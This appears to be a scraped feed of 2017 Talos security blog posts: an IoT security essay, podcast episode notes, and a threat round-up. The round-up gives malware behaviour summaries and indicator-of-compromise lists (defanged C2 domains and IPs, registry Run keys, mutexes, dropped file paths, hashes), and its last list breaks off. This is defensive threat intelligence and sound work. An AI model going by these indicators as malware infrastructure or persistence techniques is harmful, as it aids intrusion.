8752350c7df238d3bc210f13edc74486c4c5e62ee935cc32fce6d84ba2fe3664
c74a3428c963a4b8ecc86279e609b7e687d635068a7c607686c3b1228715affe
264bd038374d6dec2419788a189bc22253e944ae78e69082370700cfe163a5f6
c9c4a76991fa7dabe4c5e242eceefb2276470ab16933576b8834a72db99bdb8a
ba1e7358f4ac42e0e6d575e0f39c7a07939e31b03f82382486200b3d877fbe95
2aaeb1e014c6940fb9f1ed979622daec2bcb0afd27a431b60d575429513c4747
8fba7699a4f56f2ff0ef88137e7d9a045a8d58aeb2ee7764c70a57fd5e75c7b2
6c2e949f0e7ef6beb164e164636abfdb052386cc29318b4f80193ca1bb847e36
0fecda1f3e3c6bfc840119d3ec7788108b3bd2555cec500f9737499b57b20361
e7b20cb956fb4bfbfbaaeae08265a3986114dd84fec72e6dbbda5ff8f0f9d602
63933469402c62a974f9e8c4d3563a1b8343cb5ae4962bbf8185cbcdf22f9855
5d146dc96acac7a6026b0a82d611c18c58852c328ea55d27737b2fbb0265fc3d
54071e124b61d87336c49408a420b98046828cceba18868e2fde9170a287843a
e28775913fc2f714c665bc96babe101f509399754503dcfac1cff6614f0b5e04
2e76194f7889f84004a11d69af8df7a08c8602555a6f8629f146a593eb4bb732
d15b79df9e9a6b9d09b984b1992f8433db9734e8fbe1036aecd05c941dfc6b12
0dc28f0d53d35417a7527ec8f248487ec270992bbfd0e1837a56fcda6fe9af1a
fc66061242ba1d9cf3255437b6c8d0d8a0e6fdba3e63d9a611205b8654f11246
05264cd26e8d9c16ff1f5a71ee5641be5113ee247270072ac1e0173ee5688849

Coverage

Screenshots of Detection

Screenshot

The Internet of Vulnerable Things

noreply@blogger.com (Martin Lee) — Tue, 06 Jun 2017 10:00:00 PDT

Introduction

Technological progress is resulting in computing systems that are smaller, cheaper and consuming less power. These micro-computing systems are able to be integrated into everyday objects; when coupled with ubiquitous wireless connectivity these devices form the “Internet of Things”. The IoT has the potential to improve our lives, but only if we correctly manage the security risks which are inherent to these devices.

Gartner tells us that 6.4 billion internet connected devices were in use worldwide in 2016, and that figure will reach 20.8 billion by 2020. That equates to nearly 10 million new devices being connected every single day for the next 4 years, massively expanding the potential attack surface of unsecured devices. As businesses deploy these systems to make decisions about operational improvement, or build their business strategies around the IoT, we must consider the vulnerability of the devices and the veracity of the data they generate.

IoT security interests Cisco and Talos greatly. As part of our goal to force the bad guys to innovate, we seek out and work with vendors to fix vulnerabilities before they can be abused. For example, we identified hard coded credentials within Trane thermostats. If discovered by a threat actor, they could have remotely logged into the thermostats and gained complete control of the devices. From there they would be able to conduct reconnaissance of local networks to launch attacks. We developed protection for our customers, and held off disclosing the vulnerability until the vendor released a patch to resolve the issue.

An insecure IoT device connected to a corporate network is just another computer that can offer a point of ingress for attackers. Once compromised, an attacker can use an IoT device to gather information from the network or launch attacks against other systems. However, unlike most networked computers, the IoT device is unlikely to have anti-virus software or security software installed on it. This means that an attacker can lurk there for extended periods with little risk of discovery.

Criminals are aware of the opportunities posed by the IoT. They have “recruited” poorly secured IoT devices to form the Mirai botnet, which launched the largest denial of service (DoS) attack in history, using the stolen computing power and Internet connectivity of insecure devices to disrupt services offered by Twitter, Paypal, Spotify and other sites off and on over an entire day. Criminals have also compromised vulnerable digital video recorders used in closed-circuit television (CCTV) systems. Not to wipe incriminating video surveillance footage, but to install malware to steal processing capacity and use it to mine bitcoins in order to make money.

Not only may the devices themselves be vulnerable, but the systems that use data collected from IoT devices can be leveraged to conduct some interesting attacks. For example, a team of Israeli researchers discovered that they could fool traffic information systems into believing that there was a fake traffic jam by spoofing traffic data from bogus IoT devices.

Insecure IoT devices that interact with the physical world can be compromised to alter their function. For example, electronic hotel locks allow visitors to use keycards to access their rooms. However, the communications port on these devices can be hacked to take advantage of inadequate security features on the lock to allow anyone with the necessary knowledge to open the door without a key.

Even unlikely items such as toys and homeware can be considered as IoT devices, and found to include network vulnerabilities. Hackers can compromise a connected Barbie to spy on you, and subvert baby monitors to monitor you and your children. You can even be “watched” through your Smart TV.

Pressures Lead to IoT Security Issues

As the world builds the infrastructure and deploys the devices that comprise the IoT, we as a society have the opportunity to apply the decades of good practices learnt as part of the development of the Internet – including painful lessons about the importance of security.

The premise of the IoT is built upon the idea of deploying many cheap, Internet-connected devices in many places. As the market develops, manufacturers are hurrying to bring devices to market at the lowest price possible, and few buyers are insisting upon security requirements as part of their procurement processes. This means that many IoT products are sold containing known vulnerabilities without, or with little thought to, how updates can be applied to devices in order to remediate security issues.

Considering security issues early in the design phases means that protection can be built-in within a system. Every feature of an IoT system – from the device itself, to the wireless communications, to the user interface, to the management interface – are associated with weaknesses which are well known and characterized. Similarly, defenses against these types of weaknesses are also well known. Specifying that security is a requirement for a system, and pinpointing the types of protection that are needed, leads to a system that is more resilient and less likely to be compromised, less likely to suffer major losses when a compromise occurs and easier to update to remediate issues when they are discovered.

Not addressing security issues comes at a heavy cost. Installing insecure electronic locks means that the locks might as well not be there. They can be hacked to open for anyone. Deploying insecure devices that connect to a corporate network is like leaving an office door unlocked overnight, allowing anyone to creep in and take what they wish. Vulnerable IoT products may be banned outright, e.g. the Internet-connected doll, Cayla, in Germany.

Security issues present in many forms. Resolving any single issue first requires awareness of the problem, an understanding how the issue has come about and how it can be remediated or mitigated against. Only then can we put the correct security strategy in place.

Software vulnerabilities are one such security issue affecting the IoT. Talos has a dedicated team hunting for software vulnerabilities in IoT and other systems. When we find a new vulnerability, we follow our published Responsible Disclosure Policy to ensure that our customers are protected and that the problem gets fixed. By sharing these findings, we can inform and protect the community at-large and contribute to the discussion on securing the IoT.

“Tricking” The IoT

Anyone who has been involved in writing code, or ensuring that an IT project is completed as required, on time, and on budget, will agree that writing software is hard. Creating software-based systems that meet requirements is difficult enough. To be secure, the system must not only do what it is supposed to do, but never do anything else.

Vulnerabilities are simply weaknesses in a system that can be used to “trick” a system into doing something that it wasn’t supposed to do. Often, vulnerabilities lurk undiscovered because we need a specific set of circumstances to find them, i.e. we won’t encounter them unless we specifically probe for them. Once an adversary discovers them, they gain access to resources and data, or even the ability to run code in ways that the system designers never imagined or wanted.

Any system containing software will almost certainly include vulnerabilities. In this respect, the IoT is no different from any other computer device. Continuously considering security as part of the requirements, system design and development will help identify potential mistakes early so that they can be rectified. The further down the development process that a security issue is identified, the more expensive it is to fix.

Despite best efforts, it is almost certain that a final system will contain vulnerabilities. Encouraging the responsible disclosure of vulnerabilities combined with a rapid “fix” process helps minimize risk and exposure to harm. It also means that the software engineering community can learn for the mistakes of others and not make the same mistakes twice.

IoT Risks In Real Life

One of the key issues that Talos sees time and again is hard coded usernames and passwords within systems. When discovered, an attacker can uses these to gain access to all the devices that share these default credentials across the world. Just last year we disclosed this exact issue within Trane thermostats. We worked with Trane to ensure that the problem was fixed.

IoT systems require management interfaces to control the operation of the devices, and to process collected data. In addition, we recently discovered a way that attackers could take control of an IoT installation controlled by LabVIEW and also found how attackers can exploit an Aerospike database to take control of the platform.

What Needs to Change

Nothing will change unless people are aware of the issue. Being open about vulnerabilities when they are encountered helps users consider their own security requirements and assess additional security features that they may wish to deploy. It helps them prioritize their patching regimen, or even better, simply inform them as to why an automated system update has been applied. Keeping quiet about security issues benefits nobody except attackers who wish to use the vulnerability to attack systems.

Vendors must ensure that the software they develop is designed, developed and tested to be as secure as possible. Despite best efforts, hackers will discover vulnerabilities and systems will need to be patched. Making the patching process as quick and easy as possible (preferably automated) enables the distribution of security updates, with new features and functionality. For businesses and consumers to truly embrace the convenience and power of IoT, they must feel fully confident that we’re building IoT with security foremost in mind.

Protecting Your Systems

The upshot: Make security part of the procurement process. Ask vendors about how they discover and resolve vulnerabilities. If their answers don’t meet your expectations, don’t make the purchase.

Segment networks that contain IoT devices. There is no need to have a potentially vulnerable connected thermostat on the same network as your customer database. Separate networks so that, if a device does become compromised, the potential for damage is limited.

Protect IoT devices with appropriate network security measures. IoT devices are computers and require the same security measures as any other networked machine. Protect them with firewalls to block unpermitted network connections, and use IDS/IPS systems to block and alert on the presence unauthorized network traffic.

Plan how you will keep systems fully patched, how you will learn about required patches, and what you will do if a vendor is unwilling or unable to release a patch.

Don’t overlook management systems. Databases and dashboards are associated with many security risks, notably that of authenticating users and assuring the integrity of data collection. Verify that a single compromised device can’t result in the leakage or deletion of your entire database. Similarly, ensure that a graphical front end isn’t vulnerable to Cross Site Scripting (XSS) attacks that could lead to an attacker gaining access to sensitive systems.

Conclusion

IoT systems have the capability to make great changes to our professional and personal lives. The IoT has the capability to reduce waste, improve efficiency, and create new markets through new opportunities and newly gathered data.

In other words, the IoT will enable our societies to grow, progress and improve. But we must feel confident in the security of these devices to fully realize their benefits. We know how IoT systems can be attacked and subverted. We know the consequences of such attacks, and we know how these attacks can be defended and mitigated against.

Society can protect IoT systems from harm, but only if that protection is insisted upon by those who are deploying, purchasing and delivering the systems. Buyers must demand better security, and manufacturers must understand the gravity of the situation. No longer can they simply strive to be first to market; they must also strive to be the safest to market. If we all start demanding better security, manufacturers will make safety a priority.

BWT EP5 - It Has Been 0-days Since This Term was Abused

noreply@blogger.com (Mitch Neff) — Tue, 30 May 2017 11:42:00 PDT

Beers with Talos Episode 5 "It Has Been 0-days Since This Term was Abused" is now available

Listen here:

Listen via iTunes
Listen directly on the Talos Podcasts page.

Episode Notes:

The crew talks about the potential of Samba echoing WannaCry and blocking SMB ports (but you already did that, RIGHT?). We discuss some history lessons and give proper usage guidance on words like 0-days, backdoors, and other terms that the industry loves to hype and abuse for extra clicks.

What we learn in the Roundtable this week: Joel struggles to resolve the conflicts inherent in his design choices, Nigel’s daughter steals high-end electronics, Matt gaslights first responders in a major American city, Craig learns the JRE sandbox is a silver bullet, and Mitch issues a passive aggressive non-apology for just trying to make you happy.

Feedback question:

What is stuck in Joel’s head? Tweet us @TalosSecurity, use #BWT (also, what does #BWT mean?)

Topic table:

11:45 - Samba and why linux worms are hard. Really hard. And seriously, block 445.

22:56 - When being a victim of a cyberattack is kiiinda your fault

25:45 - Sometimes patching is impossible

27:20 - Words mean things - Backdoors, 0-Days, and such

38:55 - Checkboxes will not save your butt when you must adjust fire.

Referenced Links:

Talos WannaCry Post - http://blog.talosintelligence.com/2017/05/wannacry.html

Talos Samba Post - http://blog.talosintelligence.com/2017/05/samba-vuln-details.html

Talos SSH Post - http://blog.talosintelligence.com/2015/04/threat-spotlight-sshpsychos.html

Federal News Radio - https://federalnewsradio.com/technology/2016/10/hackers-not-yet-pulling-big-guns-data-breaches-nsa-official-warns/

==========

Featuring

Craig Williams, Joel Esler, Matt Olney, and Nigel Houghton.

Hosted by

Mitch Neff.

Find all episodes

http://cs.co/talospodcast

Subscribe via iTunes

http://cs.co/talositunes (and leave a review!)

Check out the Talos Threat Research Blog

http://cs.co/talosresearch

Subscribe to the Threat Source newsletter

http://cs.co/talosupdate

Follow Talos on Twitter

http://cs.co/talostwitter

Give us your feedback and suggestions for topics

beerswithtalos@cisco.com

Threat Round-up for May 19 - May 26

noreply@blogger.com (Alexander Chiu) — Fri, 26 May 2017 09:41:00 PDT

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 19 and May 26. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

Pdf.Tool.HeapSprayHeuristic-6316003-1
JS Heap Spray
PDFs leverage embedded JavaScript to exploit vulnerabilities or at the very least gain access to additional functionality provided by JavaScript. Typical exploitation techniques require a heap spray where JavaScript is used to copy the same data many times throughout the process' memory.
Win.Dropper.Terdot-6320310-0
Dropper
This dropper is served by Terror exploit kit, which will inject process like Explorer, to perform download for additionals binaries, and continue infection. The Dropper similar has been seen to deploy Zeus variants
Win.Trojan.Vbkrypt-10134
Trojan
VbKrypt is a VisualBasic based trojan. It can be leveraged to perform any nefarious action on the infected system such as installing additional malware, logging keystrokes, stealing files, or remotely controlling the system.
Win.Trojan.EternalRocks1
Worm
Eternalrock uses seven NSA exploits to infect victims and the CnC communication is based on Tor. The exploits are downloaded after 24h and then the samples start scanning the internet for vulnerable SMB services. The first stage downloads some necessary components and then drops another samples that has the described behavior.
Win.Trojan.Adylkuzz-6317076-0
Miner
Adylkuzz is a cryptocurrency miner used to mine the Monero cryptocurrency. It has seen a recent increase in installations from attackers using EternalBlue and DoublePulsar. See http://blog.talosintelligence.com/2017/05/adylkuzz-uiwix-eternalrocks.html for more information.
Win.Ransomware.WannaCry
Ransomware Worm
The malware then has the capability to scan heavily over TCP port 445 (Server Message Block/SMB), spreading similar to a worm, compromising hosts, encrypting files stored on them then demanding a ransom payment in the form of Bitcoin. It is important to note that this is not a threat that simply scans internal ranges to identify where to spread, it is also capable of spreading based on vulnerabilities it finds in other externally facing hosts across the internet. http://blog.talosintelligence.com/2017/05/wannacry.html
Win.Ransomware.Jaff
Ransomware
Jaff is ransomware that is primarily spread via large scale email campaigns. See the Talos Blog https://blog.talosintelligence.com/2017/05/jaff-ransomware.html for more information about this threat.

Threats

Pdf.Tool.HeapSprayHeuristic-6316003-1

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

52[.]173[.]193[.]166

Domain Names

Files and or directories created

File Hashes

526fef47936e460808fff7c605ee12e2cebe50234e7731680b545fb0863a6245
1b955f1bdc1eb61524cbd6caff84d1690551a5f7cb07b67e65cec78406c562c6
303aa9197752835d7f677a9961973371f8277f095768ad13df4b29f00a3206ff
594e36206836ac8a910adc18b412ed1c6c0bf5b46b90675b25bbbd6a7d9d238b
6a09e69f91c613b8b5b71cafd6ccb8fb2145892e3db2015228e0a27d18850a3c
8981e4350f4029e50f683b03938d55feae334e6873ccedff84e9b722bf99cc5d
a0dba623d4dc2b4fa03c0893ad08030a21401581a43ac0ebb6170a3ebc7b1eef
a80528b75ba4f54800a2008c83adc147fcdfe3dc097cb92a4925df18c01b0e0f
b1c3f1633acc80169cfe12ed884eed0d5d8912a28e05c43a9290113df4684bfd
f2ade3ddc5aa8cf52e01c0eba084a16eecb217b421c87e739223aff0cf8237cc
0567f4f2b9038c3a14eb5224140f22d7f07f99ca47b1d78d661343ef5cd50f5a
13220c18bd003aabd0260bbd40577aa3df827074ee72940e1dc76c746037e3a6
20ebeb7a52b841a483a1a1cb4337b529c7ad873b400009e52876c07291c46126
2341bb05ff14d4bae8b1c14fa9c709d5cec15ca3e0af6dbddf58d2d9d2ff4518
3385717cf4ceecad964116000d5394c52c3aa215fe483046c764c69490b75337
39a9434665b02c1598e94b8aa73b67ccd6d848ec34cfd0c49bc56d9c02032e8b
4ffd0c052cdba787983d6e05260fd1cac66f3550cbabf55b297cd099d1ede8be
60d47e644f644aa6f2842a118ee32cf2f16eb9f6726cf6b9d2ffdb5812be3cf1
6a72fe8202c34d505ca13ca34c48fc3398569cf5944b456711c115cdb9e38213
7a5c157a670543cba8bdda942636e43ad9a95c8265091b1e1e3f20a9c0407031
7ffc81ebfc069c013205e045d5f984f6017c7503dfaaed9728c315de68dceebe
a4ee1555b4586e3f28281ef0f2a367bca417de496d3224e473d6cf874a6abc22
ab01b3d5b25265b38eb8dfdfdc6a7e67eebee5c6cbde9afcf66442a82c01bf06
bb5cb32aff4fbaa252a4d2bc581e4777d4c106804a7e1f4092799be863baaa52
cf14adcac22fc30533057eccd40a82ff41eff433263b43c94515c94c5106460a

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Terdot-6320310-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

emptysand[.]ru
dogpaste[.]ru

Files and or directories created

File Hashes

9ae356843ccbda7747e45b292fcf0c3eebbcc4a93101752a0007c9abaa79037a
b9c8630f52d70a8e813e8c46911a1b010fae44ffa786f6a935cb7ffcd7077dda
5aaccf14351ea3bf2b60e9a67ae04eeaca5904fb6802f6d1c05ad27b985fd32d

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Trojan.Vbkrypt-10134

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: AutoDetect

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: IntranetName

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST

Value: C:\Documents and Settings\Administrator\Application Data\Directory\Windowsdef.exe

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: WindowsDef

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: internat.exe

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM\MUICACHE

Value: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Gwogr.bat

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: ProxyBypass

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\SHELLNOROAM\MUICACHE

Value: C:\Documents and Settings\Administrator\Application Data\Directory\Windowsdef.exe

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST

Value: C:\Documents and Settings\Administrator\Application Data\bot.exe

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: UNCAsIntranet

<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE

Value: DoNotAllowExceptions

Mutexes

Local\ZonesCounterMutex
1BZ5FV6FEI
Local\ZonesLockedCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZoneAttributeCacheCounterMutex

IP Addresses

Domain Names

Files and or directories created

%AppData%\Directory\Windowsdef.exe
%AppData%\bot.exe

File Hashes

12cb31c388e382c74397a579992e1f2652464d45630b8c7ae01e6fab03402e10
082898025d2f21461b3d818d2452b900f3401881fc5d719d40855e461bd03b84
724ddead0de7d84c07d4de7d871303530ef2b426ab454150d5fd907a0bb2f339
e437019d08da1936c43214ca6370ebe74b3ddb60a3d80cfa4a26cd3ba606b2f1
3350127c80a88cc69cf7b88993c96ff0497b0b9492eea637cfb9fa13fec04951
6de059771fa64f404f04a43f89512d5f29f0860fd413ebf98371c77664558c99

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.EternalRocks1

Indicators of Compromise

Registry Keys

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyEnable

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyServer

<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: ProxyBypass

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP

Value: ProxyBypass

<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS

Value: ProxyOverride

<HKCU>\Software\Microsoft\SystemCertificates\My
<HKLM>\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Root
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\Certificates
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
<HKLM>\SOFTWARE\Wow6432Node

Mutexes

Global\20b70e57-1c2e-4de9-99e5-69f369006912
\BaseNamedObjects\Global\20b70e57-1c2e-4de9-99e5-69f369006912
{8F6F0AC4-B9A1-45fd-A8CF-72FDEFF}

IP Addresses

82[.]195[.]75[.]101
176[.]9[.]43[.]26
193[.]23[.]244[.]244
52[.]173[.]193[.]166
134[.]19[.]177[.]109
72[.]21[.]81[.]200
192[.]168[.]1[.]245
208[.]83[.]223[.]34
195[.]154[.]12[.]146
192[.]168[.]1[.]1
131[.]188[.]40[.]189
192[.]168[.]1[.]255

Domain Names

cs9[.]wpc[.]v0cdn[.]net
archive[.]torproject[.]org
api[.]nuget[.]org
listera[.]torproject[.]org

Files and or directories created

\Program Files\Microsoft Updates\TaskScheduler\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\Tor\cached-microdescs.new
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\Microsoft.Win32.TaskScheduler.dll
\Program Files\Microsoft Updates\SharpZLib.zip
%SystemDrive%\Program Files\Microsoft Updates\temp\tor.zip
%SystemDrive%\Program Files\Microsoft Updates\Tor\torrc
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\Microsoft.Win32.TaskScheduler.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net35\Microsoft.Win32.TaskScheduler.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\fr\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll
%WinDir%\Tasks\Microsoft Tor Host.job
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\de\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\JetBrains.Annotations.dll
%System32%\config\TxR\{016888cc-6c6f-11de-8d1d-001e0bcde3ec}.TxR.blf
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\es\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net452\JetBrains.Annotations.dll
\Program Files\Microsoft Updates\temp\Tor\Data\Tor\geoip6
\Program Files\Microsoft Updates\Tor\lock
%SystemDrive%\Program Files\Microsoft Updates\Microsoft.Win32.TaskScheduler.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
%WinDir%\inf\setupapi.app.log
\Program Files\Microsoft Updates\TaskScheduler\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\Microsoft.Win32.TaskScheduler.XML
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\Microsoft.Win32.TaskScheduler.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\es\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\_rels\.rels
%SystemDrive%\Program Files\Microsoft Updates\taskhost.exe
\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RBR0L40R\taskscheduler.2.5.23[1].nupkg
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\es\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net35\Microsoft.Win32.TaskScheduler.XML
\Program Files\Microsoft Updates\taskhost.exe
\Program Files\Microsoft Updates\TaskScheduler\lib\net452\Microsoft.Win32.TaskScheduler.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\it\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net35\JetBrains.Annotations.dll
%System32%\Tasks\Microsoft\Windows\Tcpip\TorHost
\Program Files\Microsoft Updates\TaskScheduler\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\JetBrains.Annotations.xml
\Program Files\Microsoft Updates\TaskScheduler\lib\net35\JetBrains.Annotations.xml
\Program Files\Microsoft Updates\svchost.exe
\Program Files\Microsoft Updates\TaskScheduler\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\SharpZLib\[Content_Types].xml
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\it\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\Tor\state
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\it\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\temp\tor.zip
%SystemDrive%\Program Files\Microsoft Updates\SharpZLib\package\services\metadata\core-properties\e83d3d4df9744968925840934872efc3.psmdcp
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PR82RPGC\sharpziplib.0.86.0[1].nupkg
\Program Files\Microsoft Updates\temp\Tor\Data\Tor\geoip
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\JetBrains.Annotations.xml
\Program Files\Microsoft Updates\Microsoft.Win32.TaskScheduler.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for SharpZLib.zip\SharpZipLib.nuspec
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\SharpZLib\SharpZipLib.nuspec
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\JetBrains.Annotations.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\JetBrains.Annotations.xml
\Program Files\Microsoft Updates\TaskScheduler\lib\net452\fr\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\JetBrains.Annotations.dll
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net35\es\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\JetBrains.Annotations.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net452\Microsoft.Win32.TaskScheduler.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\package\services\metadata\core-properties\b413d53c92364baa9958fdda02cd8e9a.psmdcp
\Program Files\Microsoft Updates\Tor\hidden_service\private_key
\Program Files\Microsoft Updates\TaskScheduler\lib\net20\de\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net40\JetBrains.Annotations.xml
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net20\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
\Program Files\Microsoft Updates\TaskScheduler\lib\net35\fr\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net35\Microsoft.Win32.TaskScheduler.XML
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Temporary Directory 1 for TaskScheduler.zip\lib\net40\fr\Microsoft.Win32.TaskScheduler.resources.dll
%SystemDrive%\Program Files\Microsoft Updates\TaskScheduler\lib\net40\de\Microsoft.Win32.TaskScheduler.resources.dll
